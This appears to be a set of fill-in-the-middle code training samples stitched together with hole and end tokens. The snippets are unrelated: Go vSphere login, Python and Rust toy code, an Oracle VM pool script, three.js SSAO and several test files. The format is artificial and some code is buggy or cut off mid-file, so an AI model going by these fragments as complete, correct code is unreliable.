soapClient: soapClient,
}
sc, err := service.RetrieveServiceContent()
if err != nil {
panic(err)
}
version := sc.About.ApiVersion
var apiVersion string
switch version {
default:
apiVersion = APIv5_5
case "4.0":
apiVersion = APIv4_0
case "4.1":
apiVersion = APIv4_1<|fim▁hole|> case "5.0":
apiVersion = APIv5_0
case "5.1":
apiVersion = APIv5_1
case "5.5":
apiVersion = APIv5_5
}
// Now that we know the latest supported API version,
// we can re-create soapClient using such version.
session.soapClient = soap.NewClient(url, apiVersion, ignoreCert)
sc, err = service.RetrieveServiceContent()
if err != nil {
panic(err)
}
userSession, err := sc.SessionManager.Login(user, pass, "")
if err != nil {
panic(err)
}
session.ServiceInstance = service
session.ServiceContent = sc
session.UserSession = userSession
return session
}
func (s *VSphereSession) invoke(request interface{}, response interface{}) error {
// Sets session cookie
var cookie *http.Cookie
if s.sessionId != "" {
cookie = &http.Cookie{
Name: "vmware_soap_session",
Value: s.sessionId,
Secure: true,
HttpOnly: true,
Path: "/",
}
}
cookies, err := s.soapClient.Call(request, response, []*http.Cookie{cookie})
if err != nil {
return err
}
if len(cookies) > 0 {
s.sessionId = cookies[0].Value
}
return nil
}<|fim▁end|> | |
<|file_name|>main.py<|end_file_name|><|fim▁begin|>from snowball.utils import SnowMachine
from snowball.climate import WeatherProbe
# Note: multiline import limits line length
from snowball.water.phases import (
WaterVapor, IceCrystal, SnowFlake
)
def let_it_snow():
"""
Makes it snow, using a SnowMachine when weather doesn't allow it.
Returns a list of SnowFlakes.
Example::
>>> let_it_snow()
The snow machine is broken. No snow today. :/
[]
>>> let_it_snow()
[<snowball.water.phases.SnowFlake object at 0x101dbc210>,
<snowball.water.phases.SnowFlake object at 0x101dbc350>,
<snowball.water.phases.SnowFlake object at 0x101dbc1d0>,
<snowball.water.phases.SnowFlake object at 0x101dbc190>,
<snowball.water.phases.SnowFlake object at 0x101dbc3d0>,
<snowball.water.phases.SnowFlake object at 0x101dbc410>,
<snowball.water.phases.SnowFlake object at 0x101dbc450>,
<snowball.water.phases.SnowFlake object at 0x101dbc390>,<|fim▁hole|>
# Create a WeatherProbe
weather_probe = WeatherProbe()
if weather_probe.temperature < 0 and weather_probe.clouds:
# There's clouds and it's cold enough
# Create necessary components
vapor = WaterVapor()
ice = IceCrystal()
# Start with empty list of flakes
snow_flakes = []
# Now create 10 snowflakes
for counter in xrange(1, 10):
flake = SnowFlake(vapor, ice)
# Add flake to list
snow_flakes.append(flake)
return snow_flakes
else:
# The weather's not right, use the SnowMachine
snow_machine = SnowMachine()
snow_flakes = snow_machine.let_it_snow()
return snow_flakes<|fim▁end|> | <snowball.water.phases.SnowFlake object at 0x101dbc310>]
""" |
<|file_name|>lib.rs<|end_file_name|><|fim▁begin|>#![feature(collections)]
extern crate collections;
pub mod parser {
use collections::fmt::{Formatter, Result};
use std::fmt::Debug;
use collections::str::Chars;
use std::collections::BTreeMap;
use std::string;
pub enum Json {
String(string::String),
Object(self::Object),
Array(self::Array),
U64(u64),
Null
}
pub type Array = Vec<Json>;
pub type Object = BTreeMap<string::String, Json>;
impl Debug for Json {
fn fmt(&self, f: &mut Formatter) -> Result {
match *self {
Json::String(ref string) => String::fmt(string, f),
Json::Object(ref obj) => BTreeMap::fmt(obj, f),
Json::U64(ref int) => Debug::fmt(int, f),
Json::Array(ref ar) => Debug::fmt(ar, f),
_ => panic!("Noooo!")<|fim▁hole|> }
}
}
fn parse_string(it: &mut Chars) -> String {
let mut string = "".to_string();
loop {
match it.next() {
Some('"') => {
break;
},
Some('\\') => continue,
Some(c) => string.push(c),
None => panic!("Reached end of iterator.")
}
}
return string;
}
fn parse_int(it: &Chars, c: char) -> Json {
let mut num_str = c.to_string();
let clo = it.clone();
for car in clo.take_while(|a| a.is_digit(10)) {
num_str.push(car);
}
Json::U64(num_str.parse::<u64>().unwrap())
}
fn parse_value(it: &mut Chars) -> Json {
match it.next() {
Some(' ') => parse_value(it),
Some('{') => parse_object(it),
Some('"') => Json::String(parse_string(it)),
Some('[') => parse_array(it),
Some(c) => {
if c.is_digit(10) {
parse_int(it, c)
} else {
Json::Null
}
},
None => Json::Null
}
}
fn parse_array(it: &mut Chars) -> Json {
let mut ar: Array = vec![parse_value(it)];
loop {
match it.next() {
Some(']') => break,
None => break,
Some(',') => ar.push(parse_value(it)),
Some(_) => continue
}
}
Json::Array(ar)
}
fn parse_object(it: &mut Chars) -> Json {
let mut object = BTreeMap::new();
let mut key = "".to_string();
loop {
match it.next() {
Some(':') => {
object.insert(key, parse_value(it));
key = "".to_string();
},
Some('"') => {
key = parse_string(it);
},
Some('}') => break,
Some(_) => continue,
None => break
}
}
Json::Object(object)
}
pub fn parse(json: &str) -> Json {
let mut it = json.chars();
loop {
match it.next() {
Some('{') => return parse_object(&mut it),
_ => return Json::Null
}
}
}
}
#[test]
fn it_works() {
}<|fim▁end|> | |
<|file_name|>repo_pool.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os, sys, subprocess, socket, fcntl, struct
from socket import gethostname
from xml.dom.minidom import parseString
from xmlrpclib import ServerProxy, Error
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
def is_it_up(host, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(1)
s.connect((host, port))
s.close()
except:
print "host: %s:%s DOWN" % (host, port)
return False
print "host: %s:%s UP" % (host, port)
return True
# hmm master actions don't apply to a slave
master = "192.168.1.161"
port = 8899
user = "oracle"
password = "*******"
auth = "%s:%s" % (user, password)
server = ServerProxy("http://%s:%s" % ("localhost", port))
mserver = ServerProxy("http://%s@%s:%s" % (auth, master, port))
poolNode = True
interface = "c0a80100"
role = 'xen,utility'
hostname = gethostname()
ip = get_ip_address(interface)
poolMembers = []
xserver = server
print "setting up password"
server.update_agent_password(user, password)
if (is_it_up(master, port)):
print "master seems to be up, slaving"
xserver = mserver
else:
print "no master yet, will become master"
# other mechanism must be used to make interfaces equal...
try:
# pooling related same as primary storage!
poolalias = "Pool 0"
poolid = "0004fb0000020000ba9aaf00ae5e2d73"
poolfsnfsbaseuuid = "7718562d-872f-47a7-b454-8f9cac4ffa3a"
pooluuid = poolid
poolfsuuid = poolid
clusterid = "ba9aaf00ae5e2d72"
mgr = "d1a749d4295041fb99854f52ea4dea97"
poolmvip = master
poolfsnfsbaseuuid = "6824e646-5908-48c9-ba44-bb1a8a778084"
repoid = "6824e646590848c9ba44bb1a8a778084"
poolid = repoid
repo = "/OVS/Repositories/%s" % (repoid)
repomount = "cs-mgmt:/volumes/cs-data/secondary"
# primary
primuuid = "7718562d872f47a7b4548f9cac4ffa3a"
ssuuid = "7718562d-872f-47a7-b454-8f9cac4ffa3a"
fshost = "cs-mgmt"
fstarget = "/volumes/cs-data/primary"
fstype = "nfs"
fsname = "Primary storage"
fsmntpoint = "%s:%s" % (fshost, fstarget)
fsmnt = "/nfsmnt/%s" % (ssuuid)
fsplugin = "oracle.generic.NFSPlugin.GenericNFSPlugin"
# set the basics we require to "operate"
print server.take_ownership(mgr, '')
print server.update_server_roles(role,)
# if we're pooling pool...
if (poolNode == True):
poolCount = 0
pooled = False
# check pooling
try:
poolDom = parseString(xserver.discover_server_pool())
print xserver.discover_server_pool()
for node in poolDom.getElementsByTagName('Server_Pool'):
id = node.getElementsByTagName('Unique_Id')[0].firstChild.nodeValue
alias = node.getElementsByTagName('Pool_Alias')[0].firstChild.nodeValue
mvip = node.getElementsByTagName('Master_Virtual_Ip')[0].firstChild.nodeValue
print "pool: %s, %s, %s" % (id, mvip, alias)
members = node.getElementsByTagName('Member')
for member in members:
poolCount = poolCount + 1
mip = member.getElementsByTagName('Registered_IP')[0].firstChild.nodeValue
print "member: %s" % (mip)
if mip == ip:
pooled = True
else:
poolMembers.append(mip)
except Error, v:
print "no master will become master, %s" % v
if (pooled == False):
# setup the repository
print "setup repo"
print server.mount_repository_fs(repomount, repo)
try:
print "adding repo"
print server.add_repository(repomount, repo)
except Error, v:
print "will create the repo, as it's not there", v
print server.create_repository(repomount, repo, repoid, "repo")
print "not pooled!"
if (poolCount == 0):
print "no pool yet, create it"
# check if a pool exists already if not create
# pool if so add us to the pool
print "create pool fs"
print server.create_pool_filesystem(
fstype,
"%s/VirtualMachines/" % repomount,
clusterid,
poolfsuuid,
poolfsnfsbaseuuid,
mgr,
pooluuid
)
print "create pool"
print server.create_server_pool(poolalias,
pooluuid,
poolmvip,
poolCount,
hostname,
ip,
role
)
else:
print "join the pool"
print server.join_server_pool(poolalias,
pooluuid,
poolmvip,
poolCount,
hostname,
ip,
role
)<|fim▁hole|> poolMembers.append(ip)
print "mambers for pool: %s" % poolMembers
print xserver.set_pool_member_ip_list(poolMembers)
print server.discover_server_pool()
except Error, v:
print "ERROR", v<|fim▁end|> |
# add member to ip list ? |
<|file_name|>index.js<|end_file_name|><|fim▁begin|>/**
* Copyright (c) 2015-present, Facebook, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree. An additional grant
* of patent rights can be found in the PATENTS file in the same directory.
*/
'use strict';
var COLLECTION_PERIOD = 1000;
var _endedEvents = Object.create(null);
var _eventStarts = Object.create(null);
var _queuedActions = [];
var _scheduledCollectionTimer = null;
var _uuid = 1;
var _enabled = true;
function endEvent(eventId) {
var eventEndTime = Date.now();
if (!_eventStarts[eventId]) {
_throw('event(' + eventId + ') is not a valid event id!');
}
if (_endedEvents[eventId]) {
_throw('event(' + eventId + ') has already ended!');
}
_scheduleAction({
action: 'endEvent',
eventId: eventId,
tstamp: eventEndTime
});
_endedEvents[eventId] = true;
}
function signal(eventName, data) {
var signalTime = Date.now();
if (eventName == null) {
_throw('No event name specified');
}
if (data == null) {
data = null;
}
_scheduleAction({
action: 'signal',
data: data,
eventName: eventName,
tstamp: signalTime
});
}
function startEvent(eventName, data) {
var eventStartTime = Date.now();
if (eventName == null) {
_throw('No event name specified');
}
if (data == null) {
data = null;
}
var eventId = _uuid++;
var action = {
action: 'startEvent',
data: data,
eventId: eventId,
eventName: eventName,
tstamp: eventStartTime,
};
_scheduleAction(action);
_eventStarts[eventId] = action;
return eventId;
}
function disable() {
_enabled = false;
}
function _runCollection() {
/* jshint -W084 */
var action;
while ((action = _queuedActions.shift())) {
_writeAction(action);
}
_scheduledCollectionTimer = null;
}
function _scheduleAction(action) {
_queuedActions.push(action);
if (_scheduledCollectionTimer === null) {
_scheduledCollectionTimer = setTimeout(_runCollection, COLLECTION_PERIOD);
}
}
/**
* This a utility function that throws an error message.
*
* The only purpose of this utility is to make APIs like
* startEvent/endEvent/signal inlineable in the JIT.
*
* (V8 can't inline functions that statically contain a `throw`, and probably
* won't be adding such a non-trivial optimization anytime soon)
*/
function _throw(msg) {
var err = new Error(msg);
// Strip off the call to _throw()
var stack = err.stack.split('\n');
stack.splice(1, 1);
err.stack = stack.join('\n');
throw err;
}
function _writeAction(action) {
if (!_enabled) {
return;
}
var data = action.data ? ': ' + JSON.stringify(action.data) : '';
var fmtTime = new Date(action.tstamp).toLocaleTimeString();
switch (action.action) {
case 'startEvent':
console.log(
'[' + fmtTime + '] ' +
'<START> ' + action.eventName +
data
);
break;
case 'endEvent':
var startAction = _eventStarts[action.eventId];
var startData = startAction.data ? ': ' + JSON.stringify(startAction.data) : '';
console.log(<|fim▁hole|> '[' + fmtTime + '] ' +
'<END> ' + startAction.eventName +
'(' + (action.tstamp - startAction.tstamp) + 'ms)' +
startData
);
delete _eventStarts[action.eventId];
break;
case 'signal':
console.log(
'[' + fmtTime + '] ' +
' ' + action.eventName + '' +
data
);
break;
default:
_throw('Unexpected scheduled action type: ' + action.action);
}
}
exports.endEvent = endEvent;
exports.signal = signal;
exports.startEvent = startEvent;
exports.disable = disable;<|fim▁end|> | |
<|file_name|>test_utils.py<|end_file_name|><|fim▁begin|>from datetime import datetime
import listenbrainz_spark.stats.utils as stats_utils
from listenbrainz_spark.path import LISTENBRAINZ_DATA_DIRECTORY
from listenbrainz_spark import utils
from listenbrainz_spark.tests import SparkTestCase
from listenbrainz_spark.stats import offset_months, offset_days
from pyspark.sql import Row
class UtilsTestCase(SparkTestCase):
# use path_ as prefix for all paths in this class.
path_ = LISTENBRAINZ_DATA_DIRECTORY
def tearDown(self):
path_found = utils.path_exists(self.path_)
if path_found:
utils.delete_dir(self.path_, recursive=True)
def test_get_latest_listen_ts(self):
date = datetime(2020, 5, 18)
df = utils.create_dataframe(Row(listened_at=date), schema=None)
df = df.union(utils.create_dataframe(Row(listened_at=offset_days(date, 7)), schema=None))
utils.save_parquet(df, '{}/2020/5.parquet'.format(self.path_))
result = stats_utils.get_latest_listen_ts()
self.assertEqual(date, result)
def test_filter_listens(self):
from_date = datetime(2020, 5, 1)
to_date = datetime(2020, 5, 31)
df = utils.create_dataframe(Row(listened_at=offset_months(from_date, 1)), None)
df = df.union(utils.create_dataframe(Row(listened_at=offset_months(to_date, 1, shift_backwards=False)), None))
df = df.union(utils.create_dataframe(Row(listened_at=offset_days(from_date, 5, shift_backwards=False)), None))
df = df.union(utils.create_dataframe(Row(listened_at=offset_days(to_date, 5)), None))
result = stats_utils.filter_listens(df, from_date, to_date)
rows = result.collect()
<|fim▁hole|> date = datetime(2020, 5, 19)
self.assertEqual(datetime(2020, 5, 18), stats_utils.get_last_monday(date))<|fim▁end|> | self.assertEqual(rows[0]['listened_at'], offset_days(from_date, 5, shift_backwards=False))
self.assertEqual(rows[1]['listened_at'], offset_days(to_date, 5))
def test_get_last_monday(self): |
<|file_name|>SSAO.js<|end_file_name|><|fim▁begin|>/**
* This Control enables to render a Scene with a Screen Space Ambient Occlusion (SSAO) effect.
*
* @namespace GIScene
* @class Control.SSAO
* @constructor
* @extends GIScene.Control
*/
GIScene.Control.SSAO = function() {
//inherit
GIScene.Control.call(this);
var scenePass;
var ssaoEffect;
var fxaaEffect;
var depthTarget;
var depthShader;
var depthUniforms;
var depthMaterial;
var depthCam;
var activeCam;
var updateDepthCam = function() {
// if(depthCam !== undefined && depthCam.parent !== undefined){
// this.scene.camera.remove(depthCam);
// }
//depthCam
activeCam = (this.scene.camera instanceof THREE.CombinedCamera)?
( (this.scene.camera.inPerspectiveMode)? this.scene.camera.cameraP : this.scene.camera.cameraO )
:
this.scene.camera;
depthCam = activeCam.clone();
this.scene.camera.add(depthCam);
// depthCam = new THREE.PerspectiveCamera();
// //POSITION
// depthCam.fov = activeCam.fov;
// depthCam.aspect = activeCam.aspect;
depthCam.near = 0.1;
depthCam.far = 1000;
depthCam.updateProjectionMatrix();
//console.log(depthCam);
//updateSsaoUniforms();//mca
}.bind(this);
var updateSsaoUniforms = function() {
ssaoEffect.uniforms[ 'tDepth' ].value = depthTarget;
ssaoEffect.uniforms[ 'size' ].value.x = this.scene.canvas.width;
ssaoEffect.uniforms[ 'size' ].value.y = this.scene.canvas.height;
ssaoEffect.uniforms[ 'cameraNear' ].value = depthCam.near;
ssaoEffect.uniforms[ 'cameraFar' ].value = depthCam.far;
}.bind(this);
var onBeforeRender = function() {
// activeCam = (this.scene.camera instanceof THREE.CombinedCamera)?
// ( (this.scene.camera.inPerspectiveMode)? this.scene.camera.cameraP : this.scene.camera.cameraO )
// :
// this.scene.camera;
// activeCam = this.scene.camera.cameraP.clone();
//
this.scene.root.overrideMaterial = depthMaterial;//new THREE.MeshDepthMaterial({blending: THREE.NoBlending});
// activeCam.near = 0.1;
// activeCam.far = 1500;
// activeCam.updateProjectionMatrix();
this.scene.renderer.clearTarget(depthTarget,true, true, false); //color, depth, stencil
this.scene.renderer.render(this.scene.root, depthCam, depthTarget);
// activeCam.near = this.scene.config.near;
// activeCam.far = this.scene.config.far;
// activeCam.updateProjectionMatrix();
this.scene.root.overrideMaterial = null;
//
// this.scene.root.overrideMaterial = null;
}.bind(this);
var onChangedProjection = function(event) {
console.log("chPrj2",activeCam);
updateDepthCam();
};
var onResize = function() {
updateDepthCam();
depthTarget = new THREE.WebGLRenderTarget( this.scene.canvas.width, this.scene.canvas.height, { minFilter: THREE.NearestFilter, magFilter: THREE.NearestFilter, format: THREE.RGBAFormat } );
updateSsaoUniforms();
fxaaEffect.uniforms[ 'resolution' ].value.set( 1 / this.scene.canvas.width, 1 / this.scene.canvas.height );
}.bind(this);
this.activate_ = function() {
if(!this.isActive){
scenePass = new THREE.RenderPass( this.scene.root, this.scene.camera );
ssaoEffect = new THREE.ShaderPass( THREE.SSAOShader );
depthTarget = new THREE.WebGLRenderTarget( this.scene.canvas.width, this.scene.canvas.height, { minFilter: THREE.NearestFilter, magFilter: THREE.NearestFilter, format: THREE.RGBAFormat } );
depthShader = THREE.ShaderLib[ "depthRGBA" ];
depthUniforms = THREE.UniformsUtils.clone( depthShader.uniforms );
depthMaterial = new THREE.ShaderMaterial( { fragmentShader: depthShader.fragmentShader, vertexShader: depthShader.vertexShader, uniforms: depthUniforms } );
depthMaterial.blending = THREE.NoBlending;
this.scene.addEventListener('beforeRender', onBeforeRender);
// function(){
//
// this.scene.root.overrideMaterial = depthMaterial;//new THREE.MeshDepthMaterial({blending: THREE.NoBlending});
// this.scene.camera.cameraP.near = 0.1;
// this.scene.camera.cameraP.far = 1500;
// this.scene.camera.cameraP.updateProjectionMatrix();
// this.scene.renderer.clearTarget(depthTarget,true, true, true);
// this.scene.renderer.render(this.scene.root, this.scene.camera, depthTarget);
//
// this.scene.camera.cameraP.near = this.scene.config.near;
// this.scene.camera.cameraP.far = this.scene.config.far;
// this.scene.camera.cameraP.updateProjectionMatrix();
// this.scene.root.overrideMaterial = null;
//
// }.bind(this)
// );
ssaoEffect.uniforms[ 'tDepth' ].value = depthTarget;
ssaoEffect.uniforms[ 'size' ].value.x = this.scene.canvas.width;
ssaoEffect.uniforms[ 'size' ].value.y = this.scene.canvas.height;
ssaoEffect.uniforms[ 'cameraNear' ].value = this.scene.camera.near;
ssaoEffect.uniforms[ 'cameraFar' ].value = this.scene.camera.far;
ssaoEffect.uniforms[ 'onlyAO' ].value = 1;
ssaoEffect.renderToScreen = true;
this.scene.effectComposer.addPass(scenePass);
this.scene.effectComposer.addPass(ssaoEffect);
}
//call super class method
GIScene.Control.prototype.activate.call(this);
};
this.activate = function() {
if(!this.isActive){
//depth map
depthTarget = new THREE.WebGLRenderTarget( this.scene.canvas.width, this.scene.canvas.height, { minFilter: THREE.NearestFilter, magFilter: THREE.NearestFilter, format: THREE.RGBAFormat } );
depthShader = THREE.ShaderLib[ "depthRGBA" ];
depthUniforms = THREE.UniformsUtils.clone( depthShader.uniforms );
depthMaterial = new THREE.ShaderMaterial( { fragmentShader: depthShader.fragmentShader, vertexShader: depthShader.vertexShader, uniforms: depthUniforms } );
depthMaterial.blending = THREE.NoBlending;
//depthCam
updateDepthCam();<|fim▁hole|> ssaoEffect = new THREE.ShaderPass( THREE.SSAOShader );
fxaaEffect = new THREE.ShaderPass( THREE.FXAAShader );
updateSsaoUniforms();
ssaoEffect.renderToScreen = true;
fxaaEffect.uniforms[ 'resolution' ].value.set( 1 / this.scene.canvas.width, 1 / this.scene.canvas.height );
fxaaEffect.renderToScreen = false;
//add beforeRender Event
this.scene.addEventListener('beforeRender2', onBeforeRender);
//be sure, there are no other passes active
//add passes
this.scene.effectComposer.passes = [scenePass, fxaaEffect, ssaoEffect];
// this.scene.effectComposer.addPass(scenePass);
// this.scene.effectComposer.addPass(ssaoEffect);
//add other events
window.addEventListener('resize', onResize, false);
this.scene.camera.addEventListener('changedProjection', onChangedProjection);
//call super class method
GIScene.Control.prototype.activate.call(this);
}
};
this.deactivate = function() {
if(this.isActive){
//remove passes
this.scene.effectComposer.passes = [];
//remove depthCam
this.scene.camera.remove(depthCam);
//remove Events
this.scene.removeEventListener('beforeRender2', onBeforeRender);
window.removeEventListener('resize', onResize, false);
this.scene.camera.removeEventListener('changedProjection', onChangedProjection);
//call super class method
GIScene.Control.prototype.deactivate.call(this);
}
};
};
GIScene.Control.SSAO.prototype = Object.create(GIScene.Control.prototype);<|fim▁end|> |
//define passes
scenePass = new THREE.RenderPass( this.scene.root, this.scene.camera ); |
<|file_name|>initial_work.py<|end_file_name|><|fim▁begin|><|fim▁hole|>
def start_service():
subprocess.Popen("ipy start_srv.py", stdout=subprocess.PIPE)
return 0
def close_service():
os.system("taskkill /im ipy.exe /f")<|fim▁end|> | import subprocess
import os
|
<|file_name|>_common.py<|end_file_name|><|fim▁begin|>import abc
import random
import fudge
from contextlib import contextmanager
from ..support.models import *
class BackendTestCaseMixin(object):
__metaclass__ = abc.ABCMeta
@abc.abstractproperty # pragma: no cover
def backend_class(self):
"""backend_class = TestThisBackend"""
def __init__(self, *args, **kwargs):
super(BackendTestCaseMixin, self).__init__(*args, **kwargs)
self.backend = self.backend_class()
self.name = "full_page"
basemodel = Foobar()
self.root_model_path = 'layout/%s/%s/' % (
basemodel._meta.app_label,
basemodel._meta.object_name.lower())
@staticmethod
@contextmanager
def model_meta_randomizer(model, attr):
original = getattr(model._meta, attr)
value = "random_%d" % random.randint(100, 200)
setattr(model._meta, attr, value)
yield value
setattr(model._meta, attr, original)
def test_requires_a_model_instance(self):
with self.assertRaises(TypeError):
self.backend.get_layout_template_name(Foobar, self.name)
def test_returns_proper_path(self):
expected = ['%s%s.html' % (self.root_model_path, self.name)]
result = self.backend.get_layout_template_name(Foobar(), self.name)
self.assertEqual(expected, result)
def test_renderer_can_specify_base_path(self):
model = Foobar()
with fudge.patched_context(self.backend, "base_layout_directory", "different"):
result = self.backend.get_layout_template_name(model, self.name)
expected = ['different/%s/%s/%s.html' % (
model._meta.app_label, model._meta.object_name.lower(), self.name)]
self.assertEqual(expected, result)
def test_missing_file_is_okay(self):
model = Foobar()
file_doesnt_exist = "fake_template"
expected = ['layout/%s/%s/%s.html' % (
model._meta.app_label,
model._meta.object_name.lower(),
file_doesnt_exist)]
result = self.backend.get_layout_template_name(model, file_doesnt_exist)
self.assertEqual(expected, result)
def test_uses_app_label_in_template_name(self):
model = Foobar()
with self.model_meta_randomizer(model, 'app_label') as app_label:
expected = ['layout/%s/%s/%s.html' % (
app_label, model._meta.object_name.lower(), self.name)]
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)
def test_uses_model_name_in_template_name(self):
model = Foobar()
with self.model_meta_randomizer(model, 'object_name') as object_name:
expected = ['layout/%s/%s/%s.html' % (
model._meta.app_label, object_name, self.name)]
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)
def test_uses_name_in_template_name(self):
name = "random_%d" % random.randint(100, 200)
expected = ['%s%s.html' % (self.root_model_path, name)]
result = self.backend.get_layout_template_name(Foobar(), name)
self.assertEqual(expected, result)
def test_proper_model_inheritance_order(self):
model = SubFoobar()
model_path = 'layout/%s/%s/' % \
(model._meta.app_label, model._meta.object_name.lower())
expected = [
'%s%s.html' % (model_path, self.name),
'%s%s.html' % (self.root_model_path, self.name)]
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)
def test_abstract_models_are_used(self):
concrete = ConcreteFoo()
abstract = AbstractFoo()
concrete_path = 'layout/%s/%s/' % \
(concrete._meta.app_label, concrete._meta.object_name.lower())
abstract_path = 'layout/%s/%s/' % \
(abstract._meta.app_label, abstract._meta.object_name.lower())
expected = [
'%s%s.html' % (concrete_path, self.name),
'%s%s.html' % (abstract_path, self.name),
'%s%s.html' % (self.root_model_path, self.name)]
result = self.backend.get_layout_template_name(concrete, self.name)
self.assertEqual(expected, result)
def test_proxy_models_are_used(self):
model = ProxyFoo()
model_path = 'layout/%s/%s/' % \
(model._meta.app_label, model._meta.object_name.lower())
expected = [
'%s%s.html' % (model_path, self.name),
'%s%s.html' % (self.root_model_path, self.name)]<|fim▁hole|>
result = self.backend.get_layout_template_name(model, self.name)
self.assertEqual(expected, result)<|fim▁end|> | |
<|file_name|>test_file_handling_popup.py<|end_file_name|><|fim▁begin|>import unittest
from GUI.PopUps.FileHandlerPopUp import FileHandlerPopUp
from Constants.FileHandlingMode import *
<|fim▁hole|> self.callbackbuttontext = "button"
self.path = "test_path"
self.filters = ["*.jpg", "*.test"]
self.imported_files = []
self.selected_presentations = []
self.presentation_names = ["test1", "test2"]
self.open_project_layout = FileHandlerPopUp(title=self.title,
default_path=self.path,
callback=self.open_callback,
callback_button_text=self.callbackbuttontext,
file_handling_mode=OpenProject,
test_mode=True)
self.import_multiple_layout = FileHandlerPopUp(title=self.title,
default_path=self.path,
callback=self.import_multiple_callback,
callback_button_text=self.callbackbuttontext,
file_handling_mode=ImportMultipleFiles,
imported_files=self.imported_files,
selected_presentations=self.selected_presentations,
presentation_names=self.presentation_names,
filters=self.filters,
test_mode=True)
self.save_project_layout = FileHandlerPopUp(title=self.title,
default_path=self.path,
callback=self.save_callback,
callback_button_text=self.callbackbuttontext,
file_handling_mode=SaveProject,
test_mode=True)
def open_callback(self, path, list, filename):
pass
def save_callback(self, path, list, filename):
pass
def import_multiple_callback(self, path, list, filename):
pass
def test_callback_button_on_open_project_popup_1(self):
self.assertTrue(self.open_project_layout.ids.callback_button.disabled)
def test_callback_button_on_open_project_popup_2(self):
self.open_project_layout.ids.filechooser.selection.append("test")
self.open_project_layout.check_selections(None, None)
self.assertFalse(self.open_project_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_1(self):
self.assertTrue(self.import_multiple_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_2(self):
self.import_multiple_layout.ids.filechooser.selection.append("test")
self.import_multiple_layout.check_selections(None, None)
self.assertTrue(self.import_multiple_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_3(self):
self.import_multiple_layout.selected_presentations.append("test")
self.import_multiple_layout.check_selections(None, None)
self.assertTrue(self.import_multiple_layout.ids.callback_button.disabled)
def test_callback_button_on_import_multiple_popup_4(self):
self.import_multiple_layout.ids.filechooser.selection.append("test")
self.import_multiple_layout.selected_presentations.append("test")
self.import_multiple_layout.check_selections(None, None)
self.assertFalse(self.import_multiple_layout.ids.callback_button.disabled)
def test_filename_input_with_valid_filename(self):
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
self.save_project_layout.check_filename(None, ".ekieki")
self.assertFalse(self.save_project_layout.ids.callback_button.disabled)
def test_filename_with_invalid_filename(self):
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
self.save_project_layout.check_filename(None, "\\ekieki")
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
def test_filename_with_empty_filename(self):
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)
self.save_project_layout.check_filename(None, "")
self.assertTrue(self.save_project_layout.ids.callback_button.disabled)<|fim▁end|> | class TestFileHandlingPopUp(unittest.TestCase):
def setUp(self):
self.title = "test" |
<|file_name|>open_close.rs<|end_file_name|><|fim▁begin|>extern crate xiapi_sys;
extern crate libc;
use xiapi_sys::xiapi;
use libc::c_void;
use std::mem;
use std::ffi::CString;
fn run() -> Result<(),String> {
let mut numDevices = 0u32;
unsafe {
let result = xiapi::xiGetNumberDevices(&mut numDevices);
println!("xiGetNumberDevices:\treturn: {}\tvalue: {}", result, numDevices);
if(numDevices == 0){
return Err(String::from("no devices listed"));
}
let wIndex = 0;<|fim▁hole|> if (open_result != 0) {
return Err(String::from("Open XI_DEVICE failed"));
}
let mut width: i32 = 0;
let mut height: i32 = 0;
let mut data_format: i32 = 0;
// always use auto exposure/gain
let mut mvret = xiapi::xiSetParamInt( *handle, CString::new(xiapi::XI_PRM_AEAG).unwrap().as_ptr(), 1);
println!("set param result {}", mvret);
// always use auto white balance for color cameras
mvret = xiapi::xiSetParamInt( *handle, CString::new(xiapi::XI_PRM_AUTO_WB).unwrap().as_ptr(), 1);
println!("set param result {}", mvret);
mvret = xiapi::xiGetParamInt( *handle, CString::new(xiapi::XI_PRM_WIDTH).unwrap().as_ptr(), &mut width);
println!("get param result {}", mvret);
mvret = xiapi::xiGetParamInt( *handle, CString::new(xiapi::XI_PRM_HEIGHT).unwrap().as_ptr(), &mut height);
println!("get param result {}", mvret);
mvret = xiapi::xiGetParamInt(*handle, CString::new(xiapi::XI_PRM_IMAGE_DATA_FORMAT).unwrap().as_ptr(), &mut
data_format);
println!("get param result {}", mvret);
mvret = xiapi::xiSetParamInt( *handle, CString::new(xiapi::XI_PRM_BUFFER_POLICY).unwrap().as_ptr(), 1);
println!("set param result {}", mvret);
//mvret = xiSetParamInt( handle, XI_PRM_ACQ_TRANSPORT_BUFFER_SIZE, 96560128);
//HandleXiResult(mvret);
//mvret = xiSetParamInt( handle, XI_PRM_RECENT_FRAME, 0);
//HandleXiResult(mvret);
//default capture timeout 10s
let timeout = 10000;
}
//
// loop {
// let mut frame = core::mat();
// try!(cam.read(&mut frame));
// if try!(frame.size()).width > 0 {
// try!(highgui::imshow(window, &mut frame));
// }
// if try!(highgui::waitKey(10)) > 0 {
// break;
// }
// }
Ok(())
}
fn main() {
run().unwrap()
}<|fim▁end|> |
let handle: xiapi::PHANDLE = libc::malloc(mem::size_of::<xiapi::PHANDLE>() as libc::size_t) as xiapi::PHANDLE;
